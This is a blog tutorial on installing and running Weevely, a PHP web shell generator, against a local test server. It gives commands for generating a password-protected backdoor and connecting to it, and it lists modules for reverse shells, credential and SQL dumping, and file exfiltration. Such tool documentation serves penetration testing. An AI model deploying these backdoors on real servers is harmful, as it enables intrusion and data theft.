Usually people use a well-known shell such as r57, or a one-line shell, but while looking around I found a good tool, so I am writing it up here as well.
This tool, Weevely, is a web shell generator.
(I once built something similar myself, but the difference in capability is considerable.)
Weevely is well known enough to ship as a default tool in Kali Linux, and it is effective as well.
In this post I will use this tool to generate a web shell.
Installing Weevely (Install Weevely & Package)
Clone the repository with git
# git clone https://github.com/epinna/weevely3.git
# cd weevely3
Install the related packages
# pip install prettytable
# apt-get install python-yaml
Verify that the installation works
# python weevely.py
[+] weevely 3.2.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password> [cmd]
[+] Load session file
weevely session <path> [cmd]
[+] Generate backdoor agent
weevely generate <password> <path>
Execute weevely - generating the shell file
# python weevely.py generate hahwul ./shell
Generated backdoor with password 'hahwul' in './shell' of 1449 byte size.
Execute weevely - connecting to the remote Weevely shell
# python weevely.py 127.0.0.1/vul_test/shell.php hahwul
(the last argument, hahwul, is the password)
[+] weevely 3.2.0
[+] Target: 127.0.0.1
[+] Session: /root/.weevely/sessions/127.0.0.1/test_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
www-data@VUL_TEST:/var/www/html $ help
:audit_filesystem Audit system files for wrong permissions.
:audit_etcpasswd Get /etc/passwd with different techniques.
:audit_suidsgid Find files with SUID or SGID flags.
:audit_phpconf Audit PHP configuration.
:bruteforce_sql Bruteforce SQL database.
:system_info Collect system information.
:system_extensions Collect PHP and webserver extension list.
:backdoor_reversetcp Execute a reverse TCP shell.
:backdoor_tcp Spawn a shell on a TCP port.
Troubleshooting
This section covers errors that can occur when running the tool after installation. The problem I ran into was a pysocks-related error when connecting to the shell after generating it.
ImportError: No module named socks
ImportError: No module named sockshandler
I hit errors saying the socks and sockshandler modules were missing, one after the other, and both are easily fixed by installing the packages.
1. ImportError: No module named socks
# pip install socksipy-branch
2. ImportError: No module named sockshandler
# apt-get install python-pysocks
If neither of these two methods works, download the latest version of PySocks and use that.
Go to https://pypi.python.org/pypi/PySocks/ and download the PySocks archive.
After extracting it, install it with setup.py.
# tar -xvf PySocks-1.5.6.tar.gz
PySocks-1.5.6/
PySocks-1.5.6/PKG-INFO
PySocks-1.5.6/setup.py
PySocks-1.5.6/socks.py
PySocks-1.5.6/sockshandler.py
# cd PySocks-1.5.6/
# python setup.py install
Then you can confirm that it runs normally, as shown below.
# weevely http://127.0.0.1/test.php hahwul
[+] weevely 3.2.0
[+] Target: 127.0.0.1
[+] Session: /root/.weevely/sessions/127.0.0.1/test_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
Manual & Custom Shell
Manual
+--------------------+------------------------------------------------------+
| generator | description |
+--------------------+------------------------------------------------------+
| :generate.img | Backdoor existing image and create related .htaccess |
| :generate.htaccess | Generate backdoored .htaccess |
| :generate.php | Generate obfuscated PHP backdoor |
+--------------------+------------------------------------------------------+
+----------------------+------------------------------------------------------------------------------+
| module | description |
+----------------------+------------------------------------------------------------------------------+
| :audit.systemfiles | Find wrong system files permissions |
| :audit.userfiles | Guess files with wrong permissions in users home folders |
| :audit.mapwebfiles | Crawl and enumerate web folders files permissions |
| :audit.phpconf | Check php security configurations |
| :audit.etcpasswd | Enumerate users and /etc/passwd content |
| :shell.sh | Execute system shell command |
| :shell.php | Execute PHP statement |
| :system.info | Collect system informations |
| :find.name | Find files with matching name |
| :find.perms | Find files with write, read, execute permissions |
| :find.suidsgid | Find files with superuser flags |
| :backdoor.reversetcp | Send reverse TCP shell |
| :backdoor.tcp | Open a shell on TCP port |
| :bruteforce.sql | Bruteforce SQL username |
| :bruteforce.sqlusers | Bruteforce all SQL users |
| :file.read | Read remote file |
| :file.webdownload | Download web URL to remote filesystem |
| :file.mount | Mount remote filesystem using HTTPfs |
| :file.enum | Enumerate remote paths |
| :file.upload2web | Upload binary/ascii file into remote web folders and guess corresponding url |
| :file.check | Check remote files type, md5 and permission |
| :file.rm | Remove remote files and folders |
| :file.ls | List directory contents |
| :file.touch | Change file timestamps |
| :file.download | Download binary/ascii files from the remote filesystem |
| :file.upload | Upload binary/ascii file into remote filesystem |
| :file.edit | Edit remote file |
| :sql.console | Run SQL console or execute single queries |
| :sql.dump | Get SQL database dump |
| :net.ifaces | Print interfaces addresses |
| :net.proxy | Install and run Proxy to tunnel traffic through target |
| :net.phpproxy | Install remote PHP proxy |
| :net.scan | Port scan open TCP ports |
+----------------------+------------------------------------------------------------------------------+
For custom shells, the following page is a good reference:
https://github.com/epinna/weevely3/wiki/developing-a-new-module
Reference Site
https://github.com/epinna/weevely3
https://github.com/epinna/weevely3/wiki#getting-started
HAHWUL, Security engineer, Gopher and H4cker!